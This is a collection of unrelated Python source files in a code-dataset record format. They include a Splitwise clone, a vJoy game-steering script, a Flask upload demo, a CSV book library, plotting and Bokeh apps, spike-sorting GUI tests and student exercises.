\t\treturn\n\t\t# \telse:\n\t\t# \t\ty=li1[0]\n\t\t# \t\tif(y[1] + li2[0][1] == 0):\n\t\t# \t\t\tgraph[final[y[0]]][final[li2[0][0]]] = graph[final[y[0]]][final[li2[0][0]]] + y[1]\n\t\t# \t\t\tsimplify(li1[1:],li2[1:],graph)\n\t\t# \t\telif(y[1] + li2[0][1] > 0):\n\t\t# \t\t\tgraph[final[y[0]]][final[li2[0][0]]] = graph[final[y[0]]][final[li2[0][0]]] - li2[0][1]\n\t\t# \t\t\ty[1] = y[1]+li2[0][1]\n\t\t# \t\t\tsimplify(li1,li2[1:],graph)\n\t\t# \t\telse:\n\t\t# \t\t\tgraph[final[y[0]]][final[li2[0][0]]] = graph[final[y[0]]][final[li2[0][0]]] + y[1]\n\t\t# \t\t\tli2[0][1]=y[1]+li2[0][1]\n\t\t# \t\t\tsimplify(li1[1:],li2,graph)\n\t\t# def f(l1,l2):\n\t\t# \tglobal graph\n\t\t# \tsimplify(l1,l2,graph)\n\n\t\t# f(l1,l2)\n\t\t# l11=[]\n\t\t# # print(graph)\n\t\t# def getMin(arr): \t\n\t\t# \tminInd = 0\n\t\t# \tfor i in range(1, N): \n\t\t# \t\tif (arr[i] < arr[minInd]): \n\t\t# \t\t\tminInd = i \n\t\t# \treturn minInd \n\t\t# def getMax(arr): \n\t\t# \tmaxInd = 0\n\t\t# \tfor i in range(1, N): \n\t\t# \t\tif (arr[i] > arr[maxInd]): \n\t\t# \t\t\tmaxInd = i \n\t\t# \treturn maxInd \n\t\t# def minOf2(x, y): \n\t\t# \treturn x if x < y else y \n\t\t# def minCashFlowRec(amount): \n\t\t# \tmxCredit = getMax(amount)\n\t\t# \tglobal l11\n\t\t# \tmxDebit = getMin(amount) \n\t\t# \tif (amount[mxCredit] == 0 and amount[mxDebit] == 0): \n\t\t# \t\treturn 0\n\t\t# \tmin = minOf2(-amount[mxDebit], amount[mxCredit]) \n\t\t# \tamount[mxCredit] -=min\n\t\t# \tamount[mxDebit] += min\n\t\t# \tl11=l11+[[mxDebit,min,mxCredit]]\n\t\t# \tminCashFlowRec(amount) \n\t\t# def minCashFlow(graph): \n\t\t# \tamount = [0 for i in range(N)] \n\t\t# \tfor p in range(N): \n\t\t# \t\tfor i in range(N): \n\t\t# \t\t\tamount[p] += (graph[i][p] - graph[p][i]) \n\t\t# \tminCashFlowRec(amount)\n\t\t# minCashFlow(graph)\n\t\t# need = []\n\t\t# for i in range(N):\n\t\t# \tl3=[]\n\t\t# \tfor j in range(N):\n\t\t# \t\tl3=l3+[0]\n\t\t# \tneed = need + [l3]\n\t\t# for i in l11:\n\t\t# \tneed[i[0]][i[2]] = i[1]\n\n\t\t# # print(need)","sub_path":"Split/splitwise/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"366126626","text":"import argparse\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport keras.models\r\n\r\nimport utils\r\n\r\n# Emulate an Xbox 360 controller:\r\n# https://github.com/tidzo/pyvjoy\r\nimport pyvjoy\r\n\r\n# Get the pixel data of a window:\r\n# Based on https://github.com/speeli/pygta5/blob/master/grabscreen.py\r\nfrom grabscreen import grab_screen\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-m', dest='model', type=str, help='trained model file')\r\n args = parser.parse_args()\r\n \r\n model = keras.models.load_model(args.model)\r\n\r\n MAX_VJOY = 32767\r\n j = pyvjoy.VJoyDevice(1)\r\n\r\n while True:\r\n # accelerate permanently\r\n j.set_button(13, 1)\r\n \r\n screen = grab_screen(wnd_title=utils.WINDOW_TITLE,\r\n dst_size=utils.CAPTURE_SIZE,\r\n src_offset=utils.WINDOW_OFFSETS)\r\n screen_mod = utils.preprocess(screen)\r\n \r\n # predict the steering angle for the current image\r\n steering_angle = float(model.predict(np.array([screen_mod]), batch_size=1))\r\n \r\n # translate to vjoy axis value\r\n j_steering = np.interp(steering_angle, [-.5, +.5], [0, MAX_VJOY])\r\n print('{} angle={}'.format('LEFT' if steering_angle < 0 else 'RIGHT', steering_angle))\r\n\r\n j.data.wAxisX = int(j_steering)\r\n j.update()\r\n\r\n cv2.imshow('screen', 
screen_mod)\r\n        if cv2.waitKey(10) & 0xFF == 27:  # ESC\r\n            j.reset()\r\n            j.update()\r\n            cv2.destroyAllWindows()\r\n            break\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303136219","text":"import os\nfrom flask import Flask, jsonify, render_template, request, url_for, send_from_directory\nfrom werkzeug.utils import secure_filename\n\nIS_SERVERLESS = bool(os.environ.get('SERVERLESS'))\nprint(IS_SERVERLESS)\n\napp = Flask(__name__)\n# Initialize the temporary upload directory\ndef init_upload_dir():\n    UPLOAD_DIR = '/tmp/uploads' if IS_SERVERLESS else os.getcwd() + '/uploads'\n    if not os.path.exists(UPLOAD_DIR):\n        os.makedirs(UPLOAD_DIR)\n    app.config['UPLOAD_DIR'] = UPLOAD_DIR\n\ninit_upload_dir()\n\n@app.route(\"/\")\ndef index():\n    return render_template('index.html')\n\n@app.route(\"/users\", methods=['GET', 'POST'])\ndef users():\n    if request.method == 'POST':\n        print(request.form)\n        uid = request.form.get('uid')\n        user = {'uid': uid, 'name': 'test1'}\n        return jsonify(data=user)\n    else:\n        limit = request.args.get('limit')\n        data = {\n            'count': limit or 2,\n            'users': [{'name': 'test1'}, {'name': 'test2'}]\n        }\n        return jsonify(data=data)\n\n@app.route(\"/users/<int:id>\")\ndef get_user(id):\n    return jsonify(data={'name': 'test1'})\n\n# File upload example\n@app.route('/upload',methods=['POST'])\ndef upload():\n    if request.method == 'POST':\n        if 'avatar' not in request.files:\n            res = {\"error\": \"No avatar file upload\"}\n            return jsonify(data=res)\n        avatar = request.files['avatar']\n\n        if avatar.filename == '':\n            res = {\"error\": \"No avatar file selected\"}\n            return jsonify(data=res)\n\n        if avatar:\n            filename = secure_filename(avatar.filename)\n            filePath = os.path.join(app.config['UPLOAD_DIR'], filename)\n            avatar.save(filePath)\n            uploadUrl = url_for('uploaded_file', filename=filename)\n            res = {'upload': uploadUrl}\n            return jsonify(data=res)\n\n@app.route('/uploads/<filename>')\ndef uploaded_file(filename):\n    return send_from_directory(app.config['UPLOAD_DIR'], filename)\n\n# Start the service on port 9000, listening on address 0.0.0.0\napp.run(debug=not IS_SERVERLESS, port=9000, host='0.0.0.0')\n","sub_path":"Webfunc-FlaskDemo/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"577224010","text":"import csv\nimport os\nfrom .DB_conn import DatabaseConnection\n\nMY_LIBRARY = 'books.csv'\n\ndef get_all():\n    \"\"\"\n    csv file\n    first line headers\n    :return: list of dict [{name: str, author: str, read: bool},{},{}....] 
None if empty\n    \"\"\"\n    try:\n        with open(MY_LIBRARY, 'r') as f:\n            return _list_to_library(list(csv.reader(f))[1:])\n    except FileNotFoundError:\n        pass # return None\n\n\ndef _list_to_library(book_list):\n    try:\n        return [{'name': book[0], 'author': book[1], 'read': book[2]} for book in book_list]\n    except IndexError:\n        raise IndexError('Incorrect book_list Format')\n\n\ndef append(book):\n    \"\"\"\n\n    :param book: (name, author, read)\n    :return: None\n    \"\"\"\n    with open(MY_LIBRARY, 'a', newline='') as f:\n        writer = csv.DictWriter(f, fieldnames=['name', 'author', 'read'])\n        if f.tell() == 0:\n            writer.writeheader()\n        try:\n            writer.writerow({'name': book[0], 'author': book[1], 'read': book[2]})\n        except IndexError:\n            raise IndexError('Incorrect book Format')\n\n\ndef delete_book(att, att_value):\n    \"\"\"\n\n    :param att: attribute in dict to look up by\n    :param att_value: value of the attribute to compare to\n    :return: boolean for is_deleted\n    \"\"\"\n    my_library = get_all()\n    is_deleted = False\n    try:\n        os.remove(MY_LIBRARY)\n    except (FileExistsError, FileNotFoundError):\n        raise FileExistsError\n    else:\n        for book in my_library:\n            try:\n                if book[att] != att_value:\n                    b = (book['name'], book['author'], book['read'])\n                    append(b)\n                else:\n                    is_deleted = True\n            except KeyError:\n                raise KeyError(f'{att} is not a key')\n    return is_deleted\n\n\ndef find_book(att, att_value):\n    \"\"\"\n\n    :param att: attribute in dict to look up by\n    :param att_value: value of the attribute to compare to\n    :return: None\n    \"\"\"\n    my_library = get_all()\n    for book in my_library:\n        try:\n            if book[att] == att_value:\n                return book\n        except KeyError:\n            raise KeyError(f'{att} is not a key')\n    pass\n\n\ndef mark_as_read(book):\n    \"\"\"\n\n    :param book: dict {name: S, author: S, read: S}\n    :return: True for update, False else\n    \"\"\"\n    if delete_book('name', book['name']):\n        append((book['name'], book['author'], True))\n        return True\n    return False\n","sub_path":"Milestone2/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556165214","text":"import math\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom altbicycle import AltBicycle\n\n\nclass AltNoiseBicycle(AltBicycle):\n    \"\"\"Implementation of the bicycle model used in the works of Althoff et al.,\n    with acceleration and steering angle as inputs, plus sensing noise\"\"\"\n\n    def __init__(self, mu, deltaT, initialspeed, noisecovariance=np.zeros((6, 6))):\n        # Constants\n        super(AltNoiseBicycle, self).__init__(mu, deltaT, initialspeed)\n        self.cov = noisecovariance\n        self.measurements = []\n\n    def sense(self):\n        noise = np.zeros((6, 1))\n        self.measurements.append(noise)\n\n    def run(self, ax, delta):\n        super(AltNoiseBicycle, self).run(ax, delta)\n        self.sense()\n\n    def show_meas(self, legend=\"Path\"):\n        \"\"\"Plot the path of the model\"\"\"\n        plt.plot(self.measurements[0], self.measurements[1], label=legend)\n        plt.legend()\n        plt.draw()\n","sub_path":"sensealtbicycle.py","file_name":"sensealtbicycle.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"458381094","text":"from importlib import import_module\nimport dataloader\n\nclass data:\n    def __init__(self, args):\n        self.trainModule = import_module('data.' + args.trainData)\n        self.testModule = [(\n            import_module('data.' 
+ d), d) for d in args.testData]\n self.args = args\n\n def getLoader(self):\n if not self.args.testOnly:\n trainSet = getattr(self.trainModule, self.args.trainData)(self.args)\n trainLoader = dataloader.MSDataLoader(\n self.args, trainSet, batch_size=self.args.batchSize,\n shuffle=True, pin_memory=True)\n else:\n trainLoader = None\n\n testSet = []\n for m in self.testModule:\n testSet = getattr(m[0], m[1])(self.args, train=False)\n\n testLoader = dataloader.MSDataLoader(\n self.args, testSet, batch_size=1,\n shuffle=False, pin_memory=True)\n\n return (trainLoader, testLoader)\n","sub_path":"code/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"510151297","text":"from intake import models as intake_models\n\n\nclass MissingAnswersError(Exception):\n pass\n\n\ndef create_submission(form, organizations, applicant_id):\n \"\"\"Save the submission data\n \"\"\"\n submission = intake_models.FormSubmission(\n answers=form.cleaned_data,\n applicant_id=applicant_id)\n submission.save()\n submission.organizations.add(*organizations)\n intake_models.ApplicationEvent.log_app_submitted(applicant_id)\n return submission\n\n\ndef fill_pdfs_for_submission(submission):\n \"\"\"Checks for and creates any needed `FilledPDF` objects\n \"\"\"\n fillables = intake_models.FillablePDF.objects.filter(\n organization__submissions=submission)\n for fillable in fillables:\n fillable.fill_for_submission(submission)\n\n\ndef get_permitted_submissions(user, ids=None, related_objects=False):\n query = intake_models.FormSubmission.objects\n if related_objects:\n query = query.prefetch_related(\n 'logs__user__profile__organization')\n if ids:\n query = query.filter(pk__in=ids)\n if user.is_staff:\n return query.all()\n org = user.profile.organization\n return query.filter(organizations=org)\n\n\n\"\"\" These methods are used for test setup only \"\"\"\n\n\ndef create_for_organizations(organizations, **kwargs):\n submission = intake_models.FormSubmission(**kwargs)\n submission.save()\n submission.organizations.add(*organizations)\n return submission\n\n\ndef create_for_counties(counties, **kwargs):\n if 'answers' not in kwargs:\n msg = (\"'answers' are needed to infer organizations \"\n \"for a form submission\")\n raise MissingAnswersError(msg)\n organizations = [\n county.get_receiving_agency(kwargs['answers'])\n for county in counties\n ]\n return create_for_organizations(\n organizations=organizations, **kwargs)\n","sub_path":"intake/services/submissions.py","file_name":"submissions.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561275052","text":"import matplotlib.pyplot as plt\n\ndef draw(x, y, title, xlabel, ylabel, legend, fn, fig):\n\tplt.figure(num = fig, figsize=(8, 5),)\n\t\n\tplt.plot(x, y, linewidth=1.0)\n\tplt.xlabel(xlabel)\n\tplt.ylabel(ylabel)\n\tplt.title(title)\n\tplt.legend([legend])\n\t#plt.show()\n\tplt.savefig(\"results/\" + fn + \".pdf\")\n\ndef drawMulti(x, y1, y2, title, xlabel, ylabel, legend1, legend2, fn, fig):\n\tplt.figure(num = fig, figsize=(8, 5),)\n\tplt.plot(x, y1)\n\tplt.plot(x, y2)\n\tplt.xlabel(xlabel)\n\tplt.ylabel(ylabel)\n\n\tplt.title(title)\n\tplt.legend([legend1,legend2])\n\t#plt.show()\n\tplt.savefig(\"results/\" + fn + 
\".pdf\")\n","sub_path":"DT_Bagging_AdaBoost/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"408234402","text":"import pandas as pd\n\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import layout, widgetbox\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.widgets import RangeSlider, Select\nfrom bokeh.plotting import figure\n\n\ndef load_data():\n data = pd.read_csv(\"data/PoliceKillingsUS.csv\", encoding=\"ISO-8859-1\")\n data[\"year\"] = data.date.apply(lambda x: int(\"20{}\".format(x.split(\"/\")[-1])))\n return data\n\n# input controls\ndata = load_data()\nyear = RangeSlider(title=\"Year\", start=data.year.min(), end=data.year.max(), value=(data.year.min(), data.year.max()))\nage = RangeSlider(title=\"Age\", start=data.age.min(), end=data.age.max(), value=(data.age.min(), data.age.max()))\nmanner_of_death = Select(title=\"Manner of death\", value=\"All\", options=[\"All\"] + data.manner_of_death.unique().tolist())\narmed = Select(title=\"Armed\", value=\"All\", options=[\"All\"] + data.armed.dropna().unique().tolist())\ngender = Select(title=\"Gender\", value=\"All\", options=[\"All\"] + data.gender.dropna().unique().tolist())\nrace = Select(title=\"Race\", value=\"All\", options=[\"All\"] + data.race.dropna().unique().tolist())\nthreat_level = Select(title=\"Threat level\", value=\"All\", options=[\"All\"] + data.threat_level.dropna().unique().tolist())\nflee = Select(title=\"Flee\", value=\"All\", options=[\"All\"] + data.flee.dropna().unique().tolist())\n\n\n\n\n\ndef update():\n data = load_data()\n\n # filter data based on controls\n data = data[(data.year >= year.value[0]) & (data.year <= year.value[1])]\n data = data[(data.age >= age.value[0]) & (data.age <= age.value[1])]\n data = data[data.manner_of_death == manner_of_death.value] if manner_of_death.value != \"All\" else data\n data = data[data.armed == armed.value] if armed.value != \"All\" else data\n data = data[data.gender == gender.value] if gender.value != \"All\" else data\n data = data[data.race == race.value] if race.value != \"All\" else data\n data = data[data.threat_level == threat_level.value] if threat_level.value != \"All\" else data\n data = data[data.flee == flee.value] if flee.value != \"All\" else data\n\n aggregated_data = data.groupby(\"state\").agg(\"size\")\n states = aggregated_data.index.tolist()\n counts = [x for x in aggregated_data]\n # return states, counts\n source.data = dict(states=states, counts=counts)\n\n# states, counts = select_data()\n\n\nsource = ColumnDataSource(data=dict(states=[], counts=[]))\nupdate()\n\n\n\n\ncontrols = [year, age, manner_of_death, armed, gender, race, threat_level, flee]\nfor control in controls:\n control.on_change('value', lambda attr, old, new: update())\nsizing_mode = 'fixed' # 'scale_width' also looks nice with this example\ninputs = widgetbox(*controls, sizing_mode=sizing_mode)\n\np = figure(x_range=source.data['states'], plot_height=350, plot_width=1000, toolbar_location=None, title=\"States counts\")\np.vbar(x='states', top='counts', width=0.9, source=source)\n\n\nl = layout([\n [inputs, p],\n], sizing_mode=sizing_mode)\n\n\n\ncurdoc().add_root(l)\n","sub_path":"myapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582376202","text":"import cv2\nimport numpy as np\nfrom objects import Mouse, 
Canvas, Button, MenuBar, ColorButton, CurrentColor, DropDown, CanvasDropDown, Label, Cursor\nfrom numpy import full, uint8\n\n\n\"\"\"\nChange the mouse color to a new color.\n\"\"\"\ndef set_color(color):\n    # if we were erasing (white), reset the cursor to its smallest size\n    if Mouse.color == (255, 255, 255): Mouse.cursor_size = 1\n    Mouse.color = color\n\ndef pencil_size(size):\n    Mouse.cursor_size = size + 1\n\ndef set_erase():\n    set_color((255, 255, 255))\n    pencil_size(40)\n\ndef image_saturation_red(percent, canvas_class):\n    new_image = np.copy(canvas_class.canvas)\n    new_image[:, :, 0] = canvas_class.canvas[:,:,0] * ((10 - percent)/10)\n    new_image[:, :, 1] = canvas_class.canvas[:,:,1] * ((10 - percent)/10)\n    canvas_class.canvas = new_image\n\ndef image_saturation_green(percent,canvas_class):\n    new_image = np.copy(canvas_class.canvas)\n    new_image[:, :, 0] = canvas_class.canvas[:,:,0] * ((10 - percent)/10)\n    new_image[:, :, 2] = canvas_class.canvas[:,:,2] * ((10 - percent)/10)\n    canvas_class.canvas = new_image\n\ndef image_saturation_blue(percent,canvas_class):\n    new_image = np.copy(canvas_class.canvas)\n    new_image[:, :, 1] = canvas_class.canvas[:,:,1] * ((10 - percent)/10)\n    new_image[:, :, 2] = canvas_class.canvas[:,:,2] * ((10 - percent)/10)\n    canvas_class.canvas = new_image\n\ndef image_blur(percent,canvas_class):\n    if percent > 0:\n        new_image = cv2.blur(canvas_class.canvas,(2 * percent,2 * percent))\n        canvas_class.canvas = new_image\n\n\"\"\"\nAdd objects to the screen.\n\"\"\"\ndef populate_frame(width):\n\n    # Create elements to place on the screen\n    canvas = Canvas(5, 75, 600, 390) # Must remain item 0 in OBJ array\n\n    # Button(x,y,width,height,text,textsize,function)\n    elements = []\n    elements.append(canvas)\n    elements.append(MenuBar(canvas, width))\n\n    # Elements.append(Button(10, 10, 100, 50, \"Clear\", canvas.clear))\n    elements.append(Button(10, 10, 55, 17, \"Save\", 0.6, canvas.export))\n    elements.append(Button(10, 30, 55, 17, \"Load\" , 0.6, canvas.load))\n    elements.append(Button(10, 50, 55, 17, \"Eraser\", 0.6, set_erase))\n\n    elements.append(Cursor())\n\n    # Color palette default set (BGR)\n    elements.append(ColorButton(230, 30, 15, 15, (255, 255, 255), set_color)) # White\n    elements.append(ColorButton(230, 10, 15, 15, (0, 0, 0), set_color)) # Black\n    elements.append(ColorButton(250, 30, 15, 15, (200, 200, 200), set_color)) # DarkGray\n    elements.append(ColorButton(250, 10, 15, 15, (0, 0, 128), set_color)) # DarkRed\n    elements.append(ColorButton(270, 30, 15, 15, (64, 64, 128), set_color)) # Brown\n    elements.append(ColorButton(270, 10, 15, 15, (0, 0, 255), set_color)) # Red\n    elements.append(ColorButton(290, 30, 15, 15, (128, 128, 255), set_color)) # Pink\n    elements.append(ColorButton(290, 10, 15, 15, (0, 128, 255), set_color)) # Orange\n    elements.append(ColorButton(310, 30, 15, 15, (128, 255, 255), set_color)) # Gold\n    elements.append(ColorButton(310, 10, 15, 15, (0, 255, 255), set_color)) # Yellow\n    elements.append(ColorButton(330, 30, 15, 15, (64, 128, 255), set_color)) # Tan\n    elements.append(ColorButton(330, 10, 15, 15, (0, 255, 0), set_color)) # Green\n    elements.append(ColorButton(350, 30, 15, 15, (0, 255, 128), set_color)) # Lime\n    elements.append(ColorButton(350, 10, 15, 15, (255, 0, 0), set_color)) # Blue\n    elements.append(ColorButton(370, 30, 15, 15, (255, 255, 0), set_color)) # Light Blue\n    elements.append(ColorButton(370, 10, 15, 15, (160, 0, 0), set_color)) # Dark Blue\n\n    # elements.append(ColorButton(230, 10, 15, 15, \"Eraser\",set_color)) # White\n    # x, y, width, height, text, text_size, function):\n    # Dropdown menu pencil size\n
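    # NOTE: assuming the DropDown class (defined in the objects module, not shown\n    # here) passes the selected option's index to its callback, pencil_size()\n    # maps 'small'/'medium'/'large' to Mouse.cursor_size 1/2/3 (it sets size + 1).\n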
    elements.append(DropDown(80, 10, 70, 20, [\"small\", \"medium\", \"large\"],(255,255,255) ,pencil_size, 0.6 ,canvas))\n\n    # CanvasDropdown menu RGB saturation\n    elements.append(Label(555,0,0.6,\"B#\"))\n\n    elements.append(CanvasDropDown(550,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_saturation_blue, 0.5, canvas))\n    elements.append(Label(503,0,0.6,\"G#\"))\n    elements.append(CanvasDropDown(498,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_saturation_green, 0.5, canvas))\n    elements.append(Label(449,0,0.6,\"R#\"))\n    elements.append(CanvasDropDown(444,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_saturation_red, 0.5, canvas))\n    # 555 0, 550 15\n    # CanvasDropdown menu ImageBlur\n    elements.append(Label(393,0,0.6,\"Blur\"))\n    elements.append(CanvasDropDown(390,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_blur, 0.5, canvas))\n\n    # This object displays the currently selected color\n    elements.append(CurrentColor(180, 10, 35, 35))\n\n    return elements, canvas\n\n\n\"\"\"\nMouse callback function.\n\"\"\"\ndef mouse_event(event, x, y, flags, elements):\n\n    for obj in elements:\n        obj.update(x, y, flags == 1)\n\n    # Set the previous mouse position\n    Mouse.x = x\n    Mouse.y = y\n    Mouse.press = Mouse.click != (flags == 1) and Mouse.click\n    Mouse.release = Mouse.click != (flags == 1) and not Mouse.click\n    Mouse.click = flags == 1\n\n\n\"\"\"\nDraw all elements on screen.\n\"\"\"\ndef draw(elements, screen):\n    screen[:] = (225, 225, 225)\n    for obj in elements:\n        obj.draw(screen)\n\n\n\"\"\"\nMain function.\n\"\"\"\ndef main():\n\n    title = \"MacroSoup Pain\" # Window title\n    fps = 30 # Frames per second\n\n    window_width, window_height = 640, 480\n    screen = full((window_height, window_width, 3), (0, 0, 0), dtype=uint8) # Frame to draw our object\n    cv2.namedWindow(title) # Create a window\n\n    elements, canvas = populate_frame(window_width)\n\n    # Execute the 'mouse_event' function each time a mouse event is detected\n    cv2.setMouseCallback(title, mouse_event, elements)\n\n    draw(elements, screen)\n\n    # Application loop\n    while cv2.getWindowProperty(title, cv2.WND_PROP_VISIBLE) != 0:\n\n        draw(elements, screen)\n\n        # Display image\n        cv2.imshow(title, screen)\n\n        # Wait to display next image and get keystrokes\n        key = cv2.waitKey(1000 // fps) & 0xFF\n\n        if key == ord(\"z\"):\n            canvas.undo()\n        elif key == ord(\"c\"):\n            canvas.clear()\n\n    # Close the window upon exiting application loop\n    cv2.destroyWindow(title)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574935158","text":"'''\nelmar_m / 22e88@mailbox.org\n-------------------------------\nLesson02: Grid Printer Exercise\n'''\n\n'''\nPart 1:\nHardcoded and primitive, executed once when the\nmodule is imported or the file is run with\n\"python grid_printer.py\".\n'''\n\n\na_line_hardcoded = '+' + '----' + '+' + '----' + '+'\nb_line_hardcoded = '|' + '    ' + '|' + '    ' + '|'\n\nprint(a_line_hardcoded)\n\nfor z in range(2):\n    for i in range(4):\n        print(b_line_hardcoded)\n    print(a_line_hardcoded)\n\n'''\nPart 2:\nA function with one argument. 
Recycling my function\nfrom part 3 by removing the second function argument\nand instead hardcoding it in the function body.\n'''\n\n\ndef gprint_single(number):\n    '''\n    Print a grid of number x number cells, each cell\n    a fixed 4 characters wide and 4 lines high.\n    '''\n    unit = 4\n\n    a_part = '+' + unit * '-'\n    b_part = '|' + unit * ' '\n\n    a_full = number * a_part + '+'\n    b_full = number * b_part + '|'\n\n    print(a_full)\n\n    for n in range(number):\n        for i in range(unit):\n            print(b_full)\n        print(a_full)\n\n'''\nPart 3:\n'''\n\n\ndef gprint(number, unit):\n    '''\n    Print a grid of number x number cells, each cell\n    unit characters wide and unit lines high.\n    '''\n\n    a_part = '+' + unit * '-'\n    b_part = '|' + unit * ' '\n\n    a_full = number * a_part + '+'\n    b_full = number * b_part + '|'\n\n    print(a_full)\n\n    for n in range(number):\n        for i in range(unit):\n            print(b_full)\n        print(a_full)\n\nif __name__ == '__main__':\n    print('i wanna be a module, please import me!')\n","sub_path":"students/elmar_m/lesson02/grid_printer.py","file_name":"grid_printer.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"160053650","text":"from tridesclous import *\nimport pyqtgraph as pg\nfrom matplotlib import pyplot\n\ndef get_spikesorter():\n    spikesorter = SpikeSorter(dirname = '../../tests/datatest')\n    #~ spikesorter = SpikeSorter(dirname = '../../tests/datatest_neo')\n    print(spikesorter.summary(level=1))\n    spikesorter.detect_peaks_extract_waveforms(seg_nums = 'all', threshold=-5.,\n                    peak_sign = '-', n_span = 2, n_left=-30, n_right=50)\n    #~ print(spikesorter.summary(level=1))\n    spikesorter.project(method = 'pca', n_components = 5)\n    spikesorter.find_clusters(7)\n    spikesorter.refresh_colors(reset=True, palette = 'husl')\n    #~ print(spikesorter.summary(level=1))\n    spikesorter.construct_catalogue()\n\n    return spikesorter\n\n\ndef test_traceviewer():\n    app = pg.mkQApp()\n\n    spikesorter = get_spikesorter()\n\n    traceviewer = TraceViewer(spikesorter=spikesorter, mode = 'memory', signal_type = 'filtered')\n    traceviewer.show()\n    traceviewer.resize(800,600)\n\n    app.exec_()\n\n\ndef test_traceviewer_linked():\n    app = pg.mkQApp()\n    spikesorter = get_spikesorter()\n\n    traceviewer0 = TraceViewer(spikesorter=spikesorter, mode = 'memory', signal_type = 'filtered')\n    traceviewer0.show()\n    traceviewer0.resize(800,600)\n\n    traceviewer1 = TraceViewer(spikesorter=spikesorter, shared_view_with = [traceviewer0], signal_type = 'unfiltered')\n    traceviewer1.show()\n    traceviewer1.resize(800,600)\n    traceviewer0.shared_view_with.append(traceviewer1)\n\n    app.exec_()\n\n\ndef test_peaklist():\n    app = pg.mkQApp()\n    spikesorter = get_spikesorter()\n\n    peaklist = PeakList(spikesorter = spikesorter)\n    peaklist.show()\n    peaklist.resize(800,400)\n\n    app.exec_()\n\ndef test_clusterlist():\n    app = pg.mkQApp()\n    spikesorter = get_spikesorter()\n\n    clusterlist = ClusterList(spikesorter = spikesorter)\n    clusterlist.show()\n    clusterlist.resize(800,400)\n\n    app.exec_()\n\ndef test_ndviewer():\n    app = pg.mkQApp()\n    spikesorter = get_spikesorter()\n\n    ndscatter = NDScatter(spikesorter)\n    ndscatter.show()\n\n    app.exec_()\n\ndef test_waveformviewer():\n    app = pg.mkQApp()\n    spikesorter = get_spikesorter()\n\n    waveformviewer = WaveformViewer(spikesorter)\n    waveformviewer.show()\n\n    app.exec_()\n\n\n\n\n\n\ndef test_cataloguewindow():\n    app = pg.mkQApp()\n    spikesorter = get_spikesorter()\n\n    win = CatalogueWindow(spikesorter)\n    win.show()\n\n    app.exec_()\n\n\ndef 
test_cataloguewindow_from_classes():\n app = pg.mkQApp()\n \n dataio = DataIO(dirname = '../../tests/datatest')\n sigs = dataio.get_signals(seg_num=0)\n peakdetector = PeakDetector(sigs)\n peak_pos = peakdetector.detect_peaks(threshold=-4, peak_sign = '-', n_span = 5)\n waveformextractor = WaveformExtractor(peakdetector, n_left=-30, n_right=50)\n limit_left, limit_right = waveformextractor.find_good_limits(mad_threshold = 1.1)\n short_wf = waveformextractor.get_ajusted_waveforms()\n clustering = Clustering(short_wf)\n features = clustering.project(method = 'pca', n_components = 5)\n clustering.find_clusters(7)\n catalogue = clustering.construct_catalogue()\n \n \n win = CatalogueWindow.from_classes(peakdetector, waveformextractor, clustering, dataio = dataio)\n win.show()\n \n app.exec_() \n \n \nif __name__ == '__main__':\n #~ test_traceviewer()\n #~ test_traceviewer_linked()\n #~ test_peaklist()\n #~ test_clusterlist()\n #~ test_ndviewer()\n #~ test_waveformviewer()\n \n test_cataloguewindow()\n #~ test_cataloguewindow_from_classes()\n","sub_path":"tridesclous/gui/tests/test_cataloguewindow.py","file_name":"test_cataloguewindow.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"545000004","text":"# Jahrme Risner\n# Homework 4\n# 14 February 2018\n\nfrom socket import *\n\nHTTP_VERSION = \"HTTP/1.1 \"\nCONTENT_TYPE = \"\\nContent-type: text/html\\n\"\n\nHEADER_SUCCESS = \"200 OK\"\nHEADER_FAILURE = \"404 Not 